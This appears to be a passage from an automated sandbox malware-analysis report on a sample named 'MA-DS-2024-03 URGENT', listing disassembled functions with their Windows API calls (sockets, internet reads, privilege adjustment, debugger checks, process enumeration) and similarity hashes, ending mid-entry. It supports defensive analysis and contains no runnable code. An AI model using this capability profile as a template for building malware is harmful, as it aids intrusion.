                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: _memmove$Exception@8Throwstd::exception::exception
                                                        • String ID:
                                                        • API String ID: 1300846289-0
                                                        • Opcode ID: 21e2f16fc20acf5e0c37246825bab101ac0f8233cbc1ac2e141ad828ed7db267
                                                        • Instruction ID: ce31bd404333394545349dab4fd8ad238969c684e33d592a62d2001407cdf1f6
                                                        • Opcode Fuzzy Hash: 21e2f16fc20acf5e0c37246825bab101ac0f8233cbc1ac2e141ad828ed7db267
                                                        • Instruction Fuzzy Hash: 3202E270A00205DBCF04DF65D9816AEBBF5EF84304F54806EE80ADB392EB39D955CB99
                                                        Function 00401287 Relevance: 7.9, APIs: 5, Instructions: 379COMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 00402612: GetWindowLongW.USER32(?,000000EB), ref: 00402623
                                                        • DefDlgProcW.USER32(?,?,?,?,?), ref: 004019FA
                                                        • GetSysColor.USER32(0000000F), ref: 00401A4E
                                                        • SetBkColor.GDI32(?,00000000), ref: 00401A61
                                                          • Part of subcall function 00401290: DefDlgProcW.USER32(?,00000020,?), ref: 004012D8
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: ColorProc$LongWindow
                                                        • String ID:
                                                        • API String ID: 3744519093-0
                                                        • Opcode ID: 8db6b4c7db5f97784a80f15b687025ec058e6c3025e7102d3aafc5b58ad8fc88
                                                        • Instruction ID: d041ec2a837aeb515327988813bafb0785b4d0a615f46c6b1421ede386c2745f
                                                        • Opcode Fuzzy Hash: 8db6b4c7db5f97784a80f15b687025ec058e6c3025e7102d3aafc5b58ad8fc88
                                                        • Instruction Fuzzy Hash: A4A124B1202544BAE629BA694C88F7F255CDF45345F14053FF602F62F2CA3C9D429ABE
                                                        Function 00476747 Relevance: 7.6, APIs: 5, Instructions: 141networkCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 00477D8B: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 00477DB6
                                                        • socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 0047679E
                                                        • WSAGetLastError.WSOCK32(00000000), ref: 004767C7
                                                        • bind.WSOCK32(00000000,?,00000010), ref: 00476800
                                                        • WSAGetLastError.WSOCK32(00000000), ref: 0047680D
                                                        • closesocket.WSOCK32(00000000,00000000), ref: 00476821
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: ErrorLast$bindclosesocketinet_addrsocket
                                                        • String ID:
                                                        • API String ID: 99427753-0
                                                        • Opcode ID: 77a8c2a142281090e394b0e0d14c417a392868478e52ac264b4faa38142e6d55
                                                        • Instruction ID: 4f4fa4b069b112be458f20050bee2991dabce79e459f6d74e9331a247e2dcb9e
                                                        • Opcode Fuzzy Hash: 77a8c2a142281090e394b0e0d14c417a392868478e52ac264b4faa38142e6d55
                                                        • Instruction Fuzzy Hash: E941D275A00600AFDB10BF258C86F6E77A89F45718F05C56EFA59BB3C3CA789D008799
                                                        Function 00485376 Relevance: 7.6, APIs: 5, Instructions: 69windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                                        • String ID:
                                                        • API String ID: 292994002-0
                                                        • Opcode ID: 7ffe818374d74fed162708100ced44c3bb0424a7746e5ca8e896d501ecac1497
                                                        • Instruction ID: 2bf7cd1b22f0a435aba1bf6783624a0e9851140f374647b9b1574053626a0f4e
                                                        • Opcode Fuzzy Hash: 7ffe818374d74fed162708100ced44c3bb0424a7746e5ca8e896d501ecac1497
                                                        • Instruction Fuzzy Hash: BB11B232700911ABEB217F269C44A6F7B99EF447A1B40483EFC45E3242DB789C0287AD
                                                        Function 004580A9 Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 004580C0
                                                        • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 004580CA
                                                        • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 004580D9
                                                        • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 004580E0
                                                        • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 004580F6
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: HeapInformationToken$AllocErrorLastProcess
                                                        • String ID:
                                                        • API String ID: 44706859-0
                                                        • Opcode ID: 81dd5e2c95f6d95ffeb542e083d257e40e9b1a3105d490f338a4361df31bd442
                                                        • Instruction ID: 8dae455e1ba13099d0d58f164bb34b259a0b96a713bdc7d240504e0717c8d456
                                                        • Opcode Fuzzy Hash: 81dd5e2c95f6d95ffeb542e083d257e40e9b1a3105d490f338a4361df31bd442
                                                        • Instruction Fuzzy Hash: EBF08C30200614AFEB104FA4EC8CE6B3BACEF4A755B10043EF90592251DF649C09DB64
                                                        Function 0046C397 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 279comCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • CoInitialize.OLE32(00000000), ref: 0046C432
                                                        • CoCreateInstance.OLE32(00492D6C,00000000,00000001,00492BDC,?), ref: 0046C44A
                                                          • Part of subcall function 00407DE1: _memmove.LIBCMT ref: 00407E22
                                                        • CoUninitialize.OLE32 ref: 0046C6B7
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: CreateInitializeInstanceUninitialize_memmove
                                                        • String ID: .lnk
                                                        • API String ID: 2683427295-24824748
                                                        • Opcode ID: 2168bc15797479d4bf9d8be8a874f14214ce5ae81521c48187290a1a744f77cd
                                                        • Instruction ID: adb56a4b7a52abdaef05598002f92e73435f728c8d9d90c66f29e414dbdf6fe1
                                                        • Opcode Fuzzy Hash: 2168bc15797479d4bf9d8be8a874f14214ce5ae81521c48187290a1a744f77cd
                                                        • Instruction Fuzzy Hash: 5AA14AB1104205AFD700EF55C881EAFB7E8EF85308F00492EF595972A2EB75EE09CB56
                                                        Function 00404B37 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • LoadLibraryA.KERNEL32(kernel32.dll,?,00404AD0), ref: 00404B45
                                                        • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00404B57
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: AddressLibraryLoadProc
                                                        • String ID: GetNativeSystemInfo$kernel32.dll
                                                        • API String ID: 2574300362-192647395
                                                        • Opcode ID: a73fa7ec54199ac5cd1cc7a5405e6f37b5fe8d156d6918c0c451661c08ead94f
                                                        • Instruction ID: eac2b9657e48c1354d3ce07b29e145d4c0a45f8badf8df95cafcbf2a1bd35060
                                                        • Opcode Fuzzy Hash: a73fa7ec54199ac5cd1cc7a5405e6f37b5fe8d156d6918c0c451661c08ead94f
                                                        • Instruction Fuzzy Hash: 8ED01274A10713CFD720AF31D818B0A76E4AF45751B218C3F9485D6690D678F8C4C75C
                                                        Function 0047EE0D Relevance: 6.2, APIs: 4, Instructions: 164processCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • CreateToolhelp32Snapshot.KERNEL32 ref: 0047EE3D
                                                        • Process32FirstW.KERNEL32(00000000,?), ref: 0047EE4B
                                                          • Part of subcall function 00407DE1: _memmove.LIBCMT ref: 00407E22
                                                        • Process32NextW.KERNEL32(00000000,?), ref: 0047EF0B
                                                        • CloseHandle.KERNEL32(00000000,?,?,?), ref: 0047EF1A
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32_memmove
                                                        • String ID:
                                                        • API String ID: 2576544623-0
                                                        • Opcode ID: 55b2806c571e794d70189e9b258b2a54ff26ce71ab56e674bdcd20fc5077a503
                                                        • Instruction ID: a98c0e68db7b9d45d0fd814aff1298f869d04e0007e226020b87bcf654703779
                                                        • Opcode Fuzzy Hash: 55b2806c571e794d70189e9b258b2a54ff26ce71ab56e674bdcd20fc5077a503
                                                        • Instruction Fuzzy Hash: BB519171504300AFD310EF21CC85EABB7E8EF88714F10492EF595A72A1DB34AD08CB96
                                                        Function 0045E616 Relevance: 5.1, APIs: 1, Strings: 2, Instructions: 561stringCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • lstrlenW.KERNEL32(?,?,?,00000000), ref: 0045E628
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: lstrlen
                                                        • String ID: ($|
                                                        • API String ID: 1659193697-1631851259
                                                        • Opcode ID: eef32c7583b458a7172a6c711d1ec7a4f2f7e3610f1f932fb94fc73443e575d2
                                                        • Instruction ID: d66d97c7bb63d5e7dad9b567a4e3f94d41a6da7275ee88609bc8c1bec3a8e44c
                                                        • Opcode Fuzzy Hash: eef32c7583b458a7172a6c711d1ec7a4f2f7e3610f1f932fb94fc73443e575d2
                                                        • Instruction Fuzzy Hash: 21322675A007059FD728CF2AC481A6AB7F0FF48310B15C56EE89ADB3A2E774E941CB44
                                                        Function 004722EE Relevance: 4.7, APIs: 3, Instructions: 164networkfileCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • InternetQueryDataAvailable.WININET(00000001,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,0047180A,00000000), ref: 004723E1
                                                        • InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 00472418
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: Internet$AvailableDataFileQueryRead
                                                        • String ID:
                                                        • API String ID: 599397726-0
                                                        • Opcode ID: a3c70a0a6e24ca0591faf7c037d9dc56e65320efe0dea4395198c10b4e567bca
                                                        • Instruction ID: 97e6fa55f52fdedc64eb36c533065f345fcd4e8e1beeb73d4f24c64f527f6271
                                                        • Opcode Fuzzy Hash: a3c70a0a6e24ca0591faf7c037d9dc56e65320efe0dea4395198c10b4e567bca
                                                        • Instruction Fuzzy Hash: 0941DA71604205BFEB20DE65DE81EFB77BCEB40314F10806FFA49A6241DABC9E419658
                                                        Function 016B1361 Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 016B1459
                                                        • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 016B1463
                                                        • UnhandledExceptionFilter.KERNEL32(-00000328,?,?,?,?,?,00000000), ref: 016B1470
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1287711947.0000000001670000.00000040.00001000.00020000.00000000.sdmp, Offset: 01670000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_1670000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                        • String ID:
                                                        • API String ID: 3906539128-0
                                                        • Opcode ID: de637b46676b8b5378ee275a9e15054317773931a312c21bfbcb9cadeb7fb001
                                                        • Instruction ID: 2177c3efa3f43ffa5886b37d2eca14ba0e9fe34f8e419668a8cca9ae81ca3248
                                                        • Opcode Fuzzy Hash: de637b46676b8b5378ee275a9e15054317773931a312c21bfbcb9cadeb7fb001
                                                        • Instruction Fuzzy Hash: BD31B275D01229ABCB21DF68DD887D8BBB8AF08710F5041DAE41DA7250EB349BC58F55
                                                        Function 0046B333 Relevance: 4.6, APIs: 3, Instructions: 73COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SetErrorMode.KERNEL32(00000001), ref: 0046B343
                                                        • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 0046B39D
                                                        • SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 0046B3EA
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: ErrorMode$DiskFreeSpace
                                                        • String ID:
                                                        • API String ID: 1682464887-0
                                                        • Opcode ID: e21071a1f309060a69139baf21bf0b81cefe721e06a6328ca3586a1a9a93214d
                                                        • Instruction ID: 737ef1c34fd19c378388d330bbb387c55d680846c188baab6e7c30573ba64571
                                                        • Opcode Fuzzy Hash: e21071a1f309060a69139baf21bf0b81cefe721e06a6328ca3586a1a9a93214d
                                                        • Instruction Fuzzy Hash: 7D21AE75A10108EFCB00EFA5D880AEEBBB8FF48314F0080AAE905AB351DB359D59CB55
                                                        Function 004587E1 Relevance: 4.6, APIs: 3, Instructions: 67COMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 00420DB6: std::exception::exception.LIBCMT ref: 00420DEC
                                                          • Part of subcall function 00420DB6: __CxxThrowException@8.LIBCMT ref: 00420E01
                                                        • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0045882B
                                                        • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00458858
                                                        • GetLastError.KERNEL32 ref: 00458865
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: AdjustErrorException@8LastLookupPrivilegePrivilegesThrowTokenValuestd::exception::exception
                                                        • String ID:
                                                        • API String ID: 1922334811-0
                                                        • Opcode ID: 12411f26038180c23832c0c29c0add3e4f81e4a72dbb589e912bb1f6addabebf
                                                        • Instruction ID: 5e41a7b511489fb1457012ee205441660039eb57adee2e696ecce50f3e5e177b
                                                        • Opcode Fuzzy Hash: 12411f26038180c23832c0c29c0add3e4f81e4a72dbb589e912bb1f6addabebf
                                                        • Instruction Fuzzy Hash: 7511BFB2514204AFE718EFA4EC85D2BB7F8EB05315B60852EF85593212EF34BC448B64
                                                        Function 0045874B Relevance: 4.5, APIs: 3, Instructions: 43memoryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00458774
                                                        • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 0045878B
                                                        • FreeSid.ADVAPI32(?), ref: 0045879B
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: AllocateCheckFreeInitializeMembershipToken
                                                        • String ID:
                                                        • API String ID: 3429775523-0
                                                        • Opcode ID: 008726f0c27652ffd03f151f72c22d205906185045b9f325022e2ab268aa6496
                                                        • Instruction ID: 222101879978235e3db2a0a583f2c1bf244a93baf2b2f2d6b5292d8d16c370cf
                                                        • Opcode Fuzzy Hash: 008726f0c27652ffd03f151f72c22d205906185045b9f325022e2ab268aa6496
                                                        • Instruction Fuzzy Hash: 4CF04F7591130CBFDF00DFF4DC89AAEB7BCEF09201F104879A901E2181D7756A088B54
                                                        Function 016B3F3D Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        • GetCurrentProcess.KERNEL32(00000003,?,016B3F13,00000003,016CDE80,0000000C,016B403D,00000003,00000002,00000000,?,016B2038,00000003), ref: 016B3F5E
                                                        • TerminateProcess.KERNEL32(00000000,?,016B3F13,00000003,016CDE80,0000000C,016B403D,00000003,00000002,00000000,?,016B2038,00000003), ref: 016B3F65
                                                        • ExitProcess.KERNEL32 ref: 016B3F77
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1287711947.0000000001670000.00000040.00001000.00020000.00000000.sdmp, Offset: 01670000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_1670000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: Process$CurrentExitTerminate
                                                        • String ID:
                                                        • API String ID: 1703294689-0
                                                        • Opcode ID: 3669050d4469ecdd7a2c49992ba4810ac14968727817fba70814efe741dd71c7
                                                        • Instruction ID: f3ea9bc4edcc9c06445a424bb16c870e89544011b8778c581cd3209842b60257
                                                        • Opcode Fuzzy Hash: 3669050d4469ecdd7a2c49992ba4810ac14968727817fba70814efe741dd71c7
                                                        • Instruction Fuzzy Hash: 0EE04F31104508ABCF116F9CDC88A993B7EFB44282F004018F94587221CB35DCD2CB44
                                                        Function 00468889 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 68COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • __time64.LIBCMT ref: 0046889B
